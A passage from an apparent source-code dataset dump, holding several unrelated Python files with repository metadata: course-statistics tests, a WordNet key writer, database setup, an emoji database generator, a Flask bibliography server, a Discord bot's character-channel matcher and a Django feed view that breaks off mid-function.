    """Tests for calculateCourseStatistics (per-course mean / std-dev)."""

    @staticmethod
    def _result(time):
        # Minimal completed result on the "red" course.
        return {"course": "red", "time": time, "incomplete": False, "position": 1}

    def test_noData(self) -> None:
        assert calculateCourseStatistics([]) == {}

    def test_oneResult(self) -> None:
        stats = calculateCourseStatistics([self._result(5)])
        assert stats == {"red": {"average": 5, "standardDeviation": 0}}

    def test_twoResults(self) -> None:
        results = [self._result(4), self._result(8)]
        assert calculateCourseStatistics(results)["red"]["average"] == 6
        assert (
            round(calculateCourseStatistics(results)["red"]["standardDeviation"]) == 3
        )
class Test_calculateCourseTop3Average:
    """Tests for calculateCourseTop3Average (mean of the best three times)."""

    @staticmethod
    def _results(times):
        # Build completed "red"-course results for the given times.
        return [
            {"course": "red", "time": time, "incomplete": False, "position": 1}
            for time in times
        ]

    def test_noData(self) -> None:
        assert calculateCourseTop3Average([]) == {}

    def test_oneResult(self) -> None:
        assert calculateCourseTop3Average(self._results([5]))["red"] == 5

    def test_twoResults(self) -> None:
        assert calculateCourseTop3Average(self._results([4, 8]))["red"] == 6

    def test_threeResults(self) -> None:
        assert calculateCourseTop3Average(self._results([4, 8, 12]))["red"] == 8

    def test_fiveResults(self) -> None:
        # Only the best three times (4, 8, 12) should contribute.
        times = [4, 8, 12, 65, 155]
        assert calculateCourseTop3Average(self._results(times))["red"] == 8

    def test_fiveResultsRandomOrder(self) -> None:
        # Input ordering must not affect the result.
        times = [12, 8, 155, 4, 65]
        assert calculateCourseTop3Average(self._results(times))["red"] == 8
class Test_getMultiplier:
    """Tests for getMultiplier (age class + course -> score multiplier)."""

    def test_runningStandardCourse(self) -> None:
        # An age class running its standard course gets the base multiplier.
        standard = [
            ("M10", "YELLOW"), ("W12", "ORANGE"), ("M14", "LIGHT GREEN"),
            ("W16", "GREEN"), ("M18", "Brown"), ("W20", "BLUE"),
            ("M21", "BROWN"), ("W35", "BLUE"), ("M40", "BROWN"),
            ("W45", "SHORT BLUE"), ("M50", "SHORT BROWN"), ("W55", "GREEN"),
            ("M60", "BLUE"), ("W65", "SHORT GREEN"), ("M70", "GREEN"),
            ("W75", "SHORT GREEN"), ("M80", "SHORT GREEN"),
        ]
        for ageClass, course in standard:
            assert getMultiplier(ageClass, course) == 1000

    def test_runningUp(self) -> None:
        # Running a harder course than standard earns a bonus multiplier.
        expected = [
            ("W10", "ORANGE", 1200), ("M12", "LIGHT GREEN", 1200),
            ("W14", "GREEN", 1210), ("M16", "BROWN", 1210),
            ("W18", "BLACK", 1452), ("M20", "BLACK", 1200),
            ("W21", "BLACK", 1200), ("M35", "BLACK", 1200),
            ("W40", "BROWN", 1210), ("M45", "BROWN", 1100),
            ("W50", "BROWN", 1331), ("M55", "SHORT BROWN", 1100),
            ("W60", "SHORT BLUE", 1100), ("M65", "BROWN", 1331),
            ("W70", "BLUE", 1331), ("M75", "GREEN", 1100),
            ("W80", "BLACK", 1933),
        ]
        for ageClass, course, multiplier in expected:
            assert getMultiplier(ageClass, course) == multiplier

    def test_badAgeClass(self) -> None:
        # Malformed age classes fall back to the base multiplier.
        for ageClass in ("W", "M", "WA", "MWERR", ""):
            assert getMultiplier(ageClass, "BROWN") == 1000
| 44.630137 | 86 | 0.57612 | 650 | 6,516 | 5.746154 | 0.178462 | 0.198394 | 0.123159 | 0.122088 | 0.448996 | 0.41071 | 0.368942 | 0.357162 | 0.313788 | 0.257296 | 0 | 0.078544 | 0.249693 | 6,516 | 145 | 87 | 44.937931 | 0.685416 | 0 | 0 | 0.290323 | 0 | 0 | 0.157459 | 0 | 0 | 0 | 0 | 0 | 0.524194 | 1 | 0.129032 | false | 0 | 0.016129 | 0.008065 | 0.185484 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5d3f1aaa2a4db3d649462b9a4b2872c64304957 | 911 | py | Python | wsdeval/formats/wordnet.py | frankier/finn-wsd-eval | 11671a7d87e16a9b45f5bea8a5db3d2f25f31d40 | [
"Apache-2.0"
] | null | null | null | wsdeval/formats/wordnet.py | frankier/finn-wsd-eval | 11671a7d87e16a9b45f5bea8a5db3d2f25f31d40 | [
"Apache-2.0"
] | 2 | 2018-09-22T08:38:23.000Z | 2019-03-22T13:11:34.000Z | wsdeval/formats/wordnet.py | frankier/finn-wsd-eval | 11671a7d87e16a9b45f5bea8a5db3d2f25f31d40 | [
"Apache-2.0"
] | null | null | null | import sys
from stiff.data.constants import UNI_POS_WN_MAP
from finntk.wordnet.reader import get_en_fi_maps
from finntk.wordnet.utils import pre_id_to_post, ss2pre
def lemmas_from_instance(wn, instance):
    """Look up WordNet lemmas for an instance XML element.

    Reads the element's `lemma` and `pos` attributes (the POS is mapped from
    universal tags via UNI_POS_WN_MAP) and returns (word, pos, lemmas).
    """
    attrs = instance.attrib
    word = attrs["lemma"]
    pos = UNI_POS_WN_MAP[attrs["pos"]]
    return word, pos, wn.lemmas(word, pos=pos)
def write_lemma(keyout, inst_id, lemma):
    """Write one answer-key line ("<inst_id> <guess>") to `keyout`.

    The guess is the English post-style synset id mapped from the chosen
    Finnish lemma, or "U" (unknown) when `lemma` is None or no fi->en
    mapping exists (the latter is also reported on stderr).
    """
    fi2en, _en2fi = get_en_fi_maps()
    guess = "U"
    if lemma is not None:
        chosen_synset_fi_id = ss2pre(lemma.synset())
        if chosen_synset_fi_id in fi2en:
            guess = pre_id_to_post(fi2en[chosen_synset_fi_id])
        else:
            sys.stderr.write(
                "No fi2en mapping found for {} ({})\n".format(
                    chosen_synset_fi_id, lemma
                )
            )
    keyout.write("{} {}\n".format(inst_id, guess))
| 30.366667 | 62 | 0.626784 | 128 | 911 | 4.1875 | 0.40625 | 0.089552 | 0.104478 | 0.119403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.270033 | 911 | 29 | 63 | 31.413793 | 0.795489 | 0 | 0 | 0.16 | 0 | 0 | 0.058178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.16 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d49c1e85942ea8815872335e92c377df02dcdd | 553 | py | Python | fosspay/database.py | shleeable/fosspay | 05aae16454463c0cd0211b4d706475837f2f007d | [
"MIT"
] | 4 | 2020-06-01T07:09:38.000Z | 2021-04-25T21:27:10.000Z | fosspay/database.py | shleeable/fosspay | 05aae16454463c0cd0211b4d706475837f2f007d | [
"MIT"
] | 3 | 2020-04-19T07:18:41.000Z | 2020-10-15T21:11:12.000Z | fosspay/database.py | shleeable/fosspay | 05aae16454463c0cd0211b4d706475837f2f007d | [
"MIT"
] | 1 | 2021-02-28T08:26:28.000Z | 2021-02-28T08:26:28.000Z | # import sqlite3
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from .config import _cfg, _cfgi
# engine = create_engine(_cfg('connection-string'), module=sqlite3.dbapi2)
# Single engine shared by the whole application; the connection string
# comes from the fosspay configuration file.
engine = create_engine(_cfg('connection-string'))
# Thread-local session registry; commits are explicit (autocommit=False).
db = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
Base = declarative_base()
# Enable the `SomeModel.query` shorthand on all declarative models.
Base.query = db.query_property()
def init_db():
    """Create all database tables for the registered models."""
    # Imported for its side effect: defining the model classes registers
    # their tables on Base.metadata before create_all runs.
    import fosspay.objects
    Base.metadata.create_all(bind=engine)
| 29.105263 | 81 | 0.797468 | 71 | 553 | 6.014085 | 0.464789 | 0.098361 | 0.117096 | 0.098361 | 0.173302 | 0.173302 | 0 | 0 | 0 | 0 | 0 | 0.006061 | 0.104882 | 553 | 18 | 82 | 30.722222 | 0.856566 | 0.157324 | 0 | 0 | 0 | 0 | 0.036717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e5d700f93cac04fc331b71c3c1e4693e6a3e9976 | 1,600 | py | Python | emojis/db/generator.py | mercuree/emojis | 43437a2929ccb1f1783ae13c8dcb9570ce401abd | [
"MIT"
] | null | null | null | emojis/db/generator.py | mercuree/emojis | 43437a2929ccb1f1783ae13c8dcb9570ce401abd | [
"MIT"
] | null | null | null | emojis/db/generator.py | mercuree/emojis | 43437a2929ccb1f1783ae13c8dcb9570ce401abd | [
"MIT"
] | null | null | null | import argparse
import os
from datetime import datetime
import requests
# Upstream emoji database (GitHub's gemoji project), fetched at generation time.
JSON_DB_FILE = 'https://raw.githubusercontent.com/github/gemoji/master/db/emoji.json'
def generate(path, dbname):
    """Download the gemoji JSON database and write it out as a Python module.

    :param path: directory in which to create the module
    :param dbname: filename of the generated module (e.g. ``db.py``)
    :raises requests.HTTPError: if the download fails
    """
    req = requests.get(JSON_DB_FILE)
    req.raise_for_status()
    data = req.json()

    path = os.path.join(path, dbname)

    # The generated module contains raw emoji characters, so it must be
    # written as UTF-8 explicitly — relying on the platform default
    # encoding (e.g. cp1252 on Windows) would raise UnicodeEncodeError.
    with open(path, 'w', encoding='utf-8') as file:
        file.write('### This is a generated file.\n')
        file.write('### Do not edit this file.\n')
        file.write('### Date: {0}\n'.format(datetime.now().isoformat()[:-7]))
        file.write('### This file is based on "{0}".\n'.format(JSON_DB_FILE))
        file.write('\n')
        file.write('from collections import namedtuple\n')
        file.write('\n')
        file.write('Emoji = namedtuple("Emoji", ["aliases", "emoji", "tags", "category"])\n')
        file.write('\n')
        file.write('EMOJI_DB = [\n')

        for emoji in data:
            # Some upstream records have no rendered character; skip them.
            if 'emoji' in emoji:
                file.write('    Emoji({aliases}, "{emoji}", {tags}, "{category}"),\n'.format(**{
                    'aliases': emoji['aliases'],
                    'emoji': emoji['emoji'],
                    'tags': emoji['tags'],
                    'category': emoji['category'],
                }))

        file.write(']\n')
if __name__ == '__main__':
    # CLI entry point: regenerate the emoji database module.
    parser = argparse.ArgumentParser(description='Generates the Emoji database.')
    parser.add_argument('--dir', default='.', help='Database location')
    # Fixed copy-pasted help text: this option is the output file name,
    # not its location.
    parser.add_argument('--dbname', default='db.py', help='Database file name')
    args = parser.parse_args()
    generate(args.dir, args.dbname)
| 32.653061 | 96 | 0.575 | 192 | 1,600 | 4.6875 | 0.380208 | 0.12 | 0.077778 | 0.046667 | 0.142222 | 0.121111 | 0.055556 | 0 | 0 | 0 | 0 | 0.002483 | 0.245 | 1,600 | 48 | 97 | 33.333333 | 0.74255 | 0 | 0 | 0.083333 | 1 | 0 | 0.31625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.138889 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5d7325ca98374479c7e719100f4da872f071b99 | 5,653 | py | Python | pdfs/Commands/WWW.py | tmearnest/sbd | 92e59ed6286ff7b6a036688db086e47951f07cdd | [
"MIT"
] | null | null | null | pdfs/Commands/WWW.py | tmearnest/sbd | 92e59ed6286ff7b6a036688db086e47951f07cdd | [
"MIT"
] | null | null | null | pdfs/Commands/WWW.py | tmearnest/sbd | 92e59ed6286ff7b6a036688db086e47951f07cdd | [
"MIT"
] | null | null | null | from .Command import Command
class WWW(Command):
    """`www` subcommand: serve the bibliography database over HTTP via Flask."""

    command = 'www'
    help = "Spin up http server"

    def set_args(self, subparser):
        # Only one option: the TCP port the development server binds to.
        subparser.add_argument("--port","-P", help="Port number to listen on", type=int, default=5000)

    def run(self, args):
        # Imports are kept local so Flask/Jinja are only required when this
        # subcommand actually runs.
        import logging
        import mimetypes
        import os

        import flask
        import jinja2

        from ..Database import Database
        from ..HTMLBib import bibContext, authorNorm
        from ..Exceptions import UserException
        from ..Bibtex import unicodeNorm

        if not args.debug:
            # Silence werkzeug's per-request logging outside debug mode.
            logging.getLogger('werkzeug').setLevel(logging.ERROR)

        # Instantiated for its side effects (opening/validating the data dir);
        # each request handler constructs its own Database below.
        Database(dataDir=args.data_dir)
        flaskApp = flask.Flask("pdfs")
        flaskApp.jinja_env.trim_blocks = True
        flaskApp.jinja_env.lstrip_blocks = True
        flaskApp.jinja_loader=jinja2.PackageLoader("pdfs")

        def mkTagList(db):
            # HTML fragment of links to every tag page; None when no tags exist.
            if db.tags:
                return ' '.join('<a class="tags" href="/tag/{0}">{0}</a>'.format(t) for t in sorted(db.tags))

        def keySort(xs):
            # Order entries by their citation key.
            return sorted(xs, key=lambda x: x.key())

        def doSearch(tag=None, text=None, author=None, title=None):
            # Build the template context for the bibliography page, filtered
            # by at most one of tag/text/author/title (checked in that order).
            db = Database(dataDir=args.data_dir)
            ctx = dict(article_dir=os.path.basename(os.path.dirname(db.dataDir)),
                       tags=mkTagList(db))

            if tag:
                ctx['entries'] = bibContext(keySort(filter(lambda x: tag in x.tags, db.works)))
                ctx['search'] = "tag:" + tag
            elif text:
                # Full-text search: keep score/fragment data alongside each entry.
                entries, searchData = [], []
                for result in db.search(text, formatter="html"):
                    entries.append(result['entry'])
                    searchData.append(result)
                bctx = bibContext(entries)
                for c,r in zip(bctx,searchData):
                    c['searchTxt'] = dict(score=r['score'], frags=r['frags'])
                # Reversed so later results come first.
                # NOTE(review): presumably db.search yields ascending score — confirm.
                ctx['entries'] = bctx[::-1]
                ctx['search'] = "text:" + text
            elif author:
                def isAuth(e):
                    # Match normalized surnames of both authors and editors.
                    n, au, ed = set(), e.author(), e.editor()
                    if au:
                        n.update(authorNorm(x.split(', ')[0]) for x in au.split(' and '))
                    if ed:
                        n.update(authorNorm(x.split(', ')[0]) for x in ed.split(' and '))
                    return author in n

                matches = keySort(filter(isAuth, db.works))
                ctx['entries'] = bibContext(matches)
                ctx['search'] = "author:" + author
            elif title:
                def m(x):
                    # Case-insensitive substring match on the normalized title.
                    return title.lower() in unicodeNorm(x.title()).lower()

                ctx['entries'] = bibContext(keySort(filter(m, db.works)))
                ctx['search'] = "title:" + title
            else:
                # No filter: show the whole bibliography.
                ctx['entries'] = bibContext(keySort(db.works))

            return ctx

        @flaskApp.route('/')
        def listFiles():
            return flask.render_template('bibliography.html', **doSearch())

        @flaskApp.route('/search')
        def searchFiles():
            # ?q=<query>&t=<text|author|title|tag>
            query=flask.request.args.get('q', '')
            queryType=flask.request.args.get('t', '')
            if queryType == "text":
                ctx = doSearch(text=query)
            elif queryType == "author":
                ctx = doSearch(author=query)
            elif queryType == "title":
                ctx = doSearch(title=query)
            elif queryType == "tag":
                ctx = doSearch(tag=query)
            else:
                raise RuntimeError("got bad query {}:{}".format(queryType, query))

            return flask.render_template('bibliography.html', **ctx)

        @flaskApp.route('/author/<author>')
        def listFilesByAuthor(author):
            return flask.render_template('bibliography.html', **doSearch(author=author))

        @flaskApp.route('/tag/<tag>')
        def listFilesByTag(tag):
            return flask.render_template('bibliography.html', **doSearch(tag=tag))

        @flaskApp.route('/<key>.pdf')
        def getPdf(key):
            # Serve the first attached file of the entry — assumed to be its
            # PDF (TODO confirm this file-ordering convention).
            db = Database(dataDir=args.data_dir)
            try:
                pdfFile = next(filter(lambda x: x.key() == key, db.works)).files[0]
            except StopIteration:
                # No entry with this citation key.
                raise KeyError
            resp = flask.make_response(open(os.path.join(db.dataDir, pdfFile), "rb").read())
            resp.content_type = 'application/pdf'
            return resp

        @flaskApp.route('/attachment/<string:key>-<int:idx>.<string:ext>')
        def getAttached(key, idx, ext):
            # Serve the idx-th attachment, guessing its MIME type from its name.
            db = Database(dataDir=args.data_dir)
            try:
                attFile = next(filter(lambda x: x.key() == key, db.works)).files[idx]
            except StopIteration:
                raise KeyError
            filePath = os.path.join(db.dataDir, attFile)
            resp = flask.make_response(open(filePath, "rb").read())
            mime, _ = mimetypes.guess_type(filePath)
            resp.content_type = mime or 'application/octet-stream'
            return resp

        @flaskApp.route('/<key>.bib')
        def getBib(key):
            # Serve the raw BibTeX source for a single entry.
            db = Database(dataDir=args.data_dir)
            e = db.find(key=key)
            resp = flask.make_response(e.bibtex)
            resp.content_type = 'text/plain'
            return resp

        try:
            flaskApp.run(port=args.port)
        except OSError as err:
            # Translate the common bind failure into a friendly user error.
            if 'Address already in use' in str(err):
                raise UserException("Port {} already in use.".format(args.port))
            else:
                raise
| 36.707792 | 109 | 0.5268 | 607 | 5,653 | 4.864909 | 0.29654 | 0.030816 | 0.032171 | 0.038943 | 0.211311 | 0.150356 | 0.12699 | 0.0447 | 0.0447 | 0.024382 | 0 | 0.003232 | 0.343181 | 5,653 | 153 | 110 | 36.947712 | 0.792082 | 0 | 0 | 0.137097 | 0 | 0 | 0.095348 | 0.016628 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112903 | false | 0 | 0.080645 | 0.040323 | 0.314516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d751700fbfc083b181f629d2da2225fc4505cb | 9,593 | py | Python | nessmado_discord_manager.py | subaru3535/discordpy-startup | 94c700f6af590c56f05708a3556198c20f9ee9e4 | [
"MIT"
] | null | null | null | nessmado_discord_manager.py | subaru3535/discordpy-startup | 94c700f6af590c56f05708a3556198c20f9ee9e4 | [
"MIT"
] | null | null | null | nessmado_discord_manager.py | subaru3535/discordpy-startup | 94c700f6af590c56f05708a3556198c20f9ee9e4 | [
"MIT"
] | null | null | null | # スクリプト名:nessmado_function.py
# バージョン:5.01
# 作成日:2019/03/xx
# 最終更新日:2019/10/14
# 作成者:(へっへ)
# スクリプト概要:
# |キャラ対策チャンネル(大元)に「質問」から始まるメッセージを投稿すると、
# |各キャラ別の対策チャンネルに文言をコピーした上で、
# |大元のキャラ対策チャンネルと雑談チャンネルに周知メッセージを送る。
"""更新履歴
2019/03/xx ver 3.0?覚えてない。
オブジェクト指向に沿ってクラス化。
2019/07/31 Ver 5.0
勇者追加。
2019/10/14 Ver 5.1
バンカズ追加。
NESS_SKILLクラス考慮。
"""
# discordAPIモジュール
from discord import message
from discord import client
from discord import channel
# 自作モジュール
from NMconfig import NMConfig
class ChannelManager:
    """Holds bot configuration and decides which character-counter channel a
    question message is about."""

    # Aliases that indicate a message is really about a *different*
    # character whose name merely contains the channel's character name
    # (e.g. "Dr. Mario" mentions for the Mario channel).
    _SHADOWING_ALIASES = {
        'マリオ': ('ドクター', 'Dr', 'dr'),
        'ファルコ': ('ファルコン',),
        'クッパ': ('ジュニア', 'Jr', 'jr'),
        'ピット': ('ブラック',),
    }

    # Per-channel nickname tables: every spelling variant / nickname that
    # should route a question to that character's channel.
    #
    # ★Notes for adapting this bot to another character-community server:
    #   1. Make the keys below match your server's channel names.
    #   2. The Ness server handles all Pokémon Trainer Pokémon in a single
    #      channel; split that entry if your server separates them.
    #   3. The Ness server has no Mii Fighter counter channels; add entries
    #      if yours does. (Neither change requires touching other methods.)
    _FUZZY_ALIASES = {
        "ドクマリ": ('ドクター', 'Dr', 'dr', '医者'),
        "ロゼッタ&チコ": ('ロゼチコ', 'ロゼッタ'),
        "クッパjr": ('ジュニア', 'Jr', 'jr'),
        "パックンフラワー": ('パックン', '花'),
        "ドンキーコング": ('DK', 'D.K.', 'D.K', 'ドンキー', 'ゴリラ'),
        "ディディーコング": ('DD', 'D.D.', 'D.D', 'ディディー', '猿'),
        "キングクルール": ('クルール', '鰐', 'ワニ'),
        "ガノンドロフ": ('ガノン', 'おじさん'),
        "ヤングリンク": ('ヤンリン', 'こどもリンク', '子どもリンク', '子供リンク'),
        "トゥーンリンク": ('トリン',),
        "ダークサムス": ('ダムス',),
        "ゼロスーツサムス": ('ダムス', 'ゼロサム', 'ZSS', 'ゼロスーツ・サムス'),
        "ピチュー": ('ピチュカス',),
        "ミュウツー": ('M2', 'm2'),
        "ポケモントレーナー": ('ポケモン・トレーナー', 'ポケトレ', 'ゼニガメ',
                      'フシギソウ', 'リザードン', 'リザ'),
        "ゲッコウガ": ('蛙',),
        "メタナイト": ('メタ',),
        "デデデ": ('デデデ大王',),
        "フォックス": ('狐',),
        "ブラックピット": ('ブラック・ピット', 'ブラピ'),
        "むらびと": ('ムラビト', '村人'),
        "アイスクライマー": ('アイス・クライマー', 'アイクラ'),
        "インクリング": ('スプラゥーン', 'インリン', 'イカちゃん', 'いかちゃん', '烏賊', 'イカ'),
        "キャプテン・ファルコン": ('ファルコン', 'キャプテンファルコン', 'CF', 'C.F', 'cf', 'c.f'),
        "ダックハント": ('ダック・ハント', '犬'),
        "ピクミン&オリマー": ('ピクミン&オリマー', 'ピクオリ', 'ピクミン', 'オリマー'),
        "リトル・マック": ('リトルマック', 'マック', 'トルマク'),
        "ロボット": ('ロボ',),
        "mrゲーム&ウォッチ": ('ゲムヲ', 'ゲムオ', 'ミスター', 'ゲーム&ウォッチ', 'ゲーム&ウォッチ'),
        "wii-fitトレーナー": ('フィットレ', 'Wii Fit', 'wii fit', 'Wii fit', 'wii Fit',
                       'Wii-Fit', 'wii-fit', 'Wii-fit', 'wii-Fit',
                       'tトレーナー', 'Tトレーナー', 't トレーナー', 'T トレーナー'),
        "パックマン": ('金玉',),
        "ベヨネッタ": ('ベヨ',),
        "ロックマン": ('ロック', '岩男'),
        "ジョーカー": ('ペルソナ',),
        "格闘mii": ('格闘Mii', '格闘MII'),
        "剣術mii": ('剣術Mii', '剣術MII'),
        "射撃mii": ('射撃Mii', '射撃MII', 'シャゲミ'),
        "勇者": ('HERO', 'hero', 'Hero', 'HELO', 'helo', 'Helo',
               'ゆうしゃ', 'ユウシャ', 'ゆーしゃ', 'ユーシャ',
               'ひーろー', 'ヒーロー', 'よしひこ', 'ヨシヒコ'),
        "バンジョー&カズーイ": ('バンジョー&カズーイ', 'バンジョーとカズーイ', 'バンカズ',
                        'バンジョー', 'カズーイ'),
        "ベレスト": ('ベレス', 'ベレト'),
    }

    def __init__(self):
        self.nmconfig = NMConfig()
        self.TOKEN = ""
        self.ZATSUDAN_CHANNEL_ID = ""
        # "counterplan" is apparently the English for 対策, but that reads
        # poorly, so the romanized "taisaku" is used in these names.
        self.CHARACTER_TAISAKU_ID = ""
        self.MATCH_CHANNEL_ID = ""
        self.TAISAKU_STAMP = ""
        self.NESS_SKILL_CHANNEL_ID = ""
        self.STARVED_MATCHING = ""
        self.MYCHARACTER = ""
        self.inputConfig()

    def inputConfig(self):
        """Copy every setting from the NMConfig object onto this instance."""
        config = self.nmconfig
        self.TOKEN = config.TOKEN
        self.ZATSUDAN_CHANNEL_ID = config.ZATSUDAN_CHANNEL_ID
        self.CHARACTER_TAISAKU_ID = config.CHARACTER_TAISAKU_ID
        self.MATCH_CHANNEL_ID = config.MATCH_CHANNEL_ID
        self.TAISAKU_STAMP = config.TAISAKU_STAMP
        self.NESS_SKILL_CHANNEL_ID = config.NESS_SKILL_CHANNEL_ID
        self.STARVED_MATCHING = config.STARVED_MATCHING
        self.MYCHARACTER = config.MYCHARACTER

    def judgeNameContained(self, client, ch_name, content) -> bool:
        """Return False when `content` actually refers to another character
        whose name contains `ch_name`; otherwise True.

        For the bot's own character the check is generalized: any other
        channel name appearing in the message disqualifies the match.
        """
        shadowing = self._SHADOWING_ALIASES.get(ch_name)
        if shadowing is not None:
            if any(alias in content for alias in shadowing):
                return False
        elif ch_name == self.MYCHARACTER:
            if self._judgeMyCharacterNameContained(client, ch_name, content):
                return False
        return True

    def _judgeMyCharacterNameContained(self, client, ch_name, content) -> bool:
        """True if the message mentions any channel name other than `ch_name`."""
        for other in client.get_all_channels():
            if other.name != ch_name and other.name in content:
                return True
        return False

    def judgeFuzzyCharacterName(self, ch_name: str, content: str):
        """Return True when `content` mentions the character of channel
        `ch_name`, tolerating common nicknames and spelling variants.

        Questioners rarely type the exact channel name, so after an exact
        substring check the per-channel alias table above is consulted.
        """
        if ch_name in content:
            return True
        for alias in self._FUZZY_ALIASES.get(ch_name, ()):
            if alias in content:
                return True
        return False
| 40.306723 | 125 | 0.533618 | 1,145 | 9,593 | 4.393013 | 0.233188 | 0.248708 | 0.20338 | 0.158648 | 0.46004 | 0.443539 | 0.413121 | 0.139364 | 0.090855 | 0.090855 | 0 | 0.008361 | 0.351715 | 9,593 | 237 | 126 | 40.476793 | 0.799003 | 0.099969 | 0 | 0.27957 | 0 | 0 | 0.099247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026882 | false | 0 | 0.021505 | 0 | 0.322581 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5d89d2a5e74dad3c40f155b2e13235f2835045c | 528 | py | Python | awx/main/management/commands/deprovision_node.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 1 | 2018-09-28T16:02:30.000Z | 2018-09-28T16:02:30.000Z | awx/main/management/commands/deprovision_node.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 4 | 2020-04-29T23:03:16.000Z | 2022-03-01T23:56:09.000Z | awx/main/management/commands/deprovision_node.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 2 | 2018-09-03T19:10:02.000Z | 2019-06-12T07:07:16.000Z | # Copyright (c) 2017 Ansible by Red Hat
# All Rights Reserved
# Borrow from another AWX command
from awx.main.management.commands.deprovision_instance import Command as OtherCommand
# Python
import warnings
class Command(OtherCommand):
    """Deprecated alias for the `deprovision_instance` management command."""

    def handle(self, *args, **options):
        # TODO: delete this entire file in 3.3
        # Warn callers about the rename, then delegate to the real command.
        warnings.warn('This command is replaced with `deprovision_instance` and will '
                      'be removed in release 3.3.')
        return super(Command, self).handle(*args, **options)
| 29.333333 | 86 | 0.69697 | 69 | 528 | 5.304348 | 0.710145 | 0.103825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01937 | 0.217803 | 528 | 17 | 87 | 31.058824 | 0.866828 | 0.251894 | 0 | 0 | 0 | 0 | 0.226221 | 0.056555 | 0 | 0 | 0 | 0.058824 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5da928182393c5f5c747b08972d2fb8f2ff9446 | 8,775 | py | Python | rss_temple/api/views/feed.py | murrple-1/rss_temple | 289197923b1e7d1213f1673d164337df17d7269b | [
"MIT"
] | null | null | null | rss_temple/api/views/feed.py | murrple-1/rss_temple | 289197923b1e7d1213f1673d164337df17d7269b | [
"MIT"
] | 8 | 2019-12-04T21:58:35.000Z | 2021-12-15T02:29:49.000Z | rss_temple/api/views/feed.py | murrple-1/rss_temple | 289197923b1e7d1213f1673d164337df17d7269b | [
"MIT"
] | null | null | null | from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound, HttpResponseNotAllowed
from django.db import transaction
import requests
import ujson
from url_normalize import url_normalize
from api import models, query_utils, feed_handler, rss_requests, archived_feed_entry_util
from api.exceptions import QueryException
from api.context import Context
# Object name handed to query_utils so it applies the 'feed' field maps,
# sort rules, and search rules.
_OBJECT_NAME = 'feed'
def feed(request):
    """View entry point for single-feed requests; only GET is supported."""
    if request.method == 'GET':
        return _feed_get(request)
    return HttpResponseNotAllowed({'GET'})  # pragma: no cover
def feeds_query(request):
    """View entry point for feed list queries; only POST is supported."""
    if request.method == 'POST':
        return _feeds_query_post(request)
    return HttpResponseNotAllowed({'POST'})  # pragma: no cover
def feed_subscribe(request):
    """View entry point for subscription management (POST/PUT/DELETE)."""
    handlers = {
        'POST': _feed_subscribe_post,
        'PUT': _feed_subscribe_put,
        'DELETE': _feed_subscribe_delete,
    }
    handler = handlers.get(request.method)
    if handler is None:
        return HttpResponseNotAllowed(handlers.keys())  # pragma: no cover
    return handler(request)
def _save_feed(url):
    """Fetch `url`, parse it as a feed, and persist the feed and its entries.

    Returns the saved models.Feed (with subscription data attached).
    Raises QueryException('feed not found', 404) if the URL cannot be fetched.
    """
    response = None
    try:
        response = rss_requests.get(url)
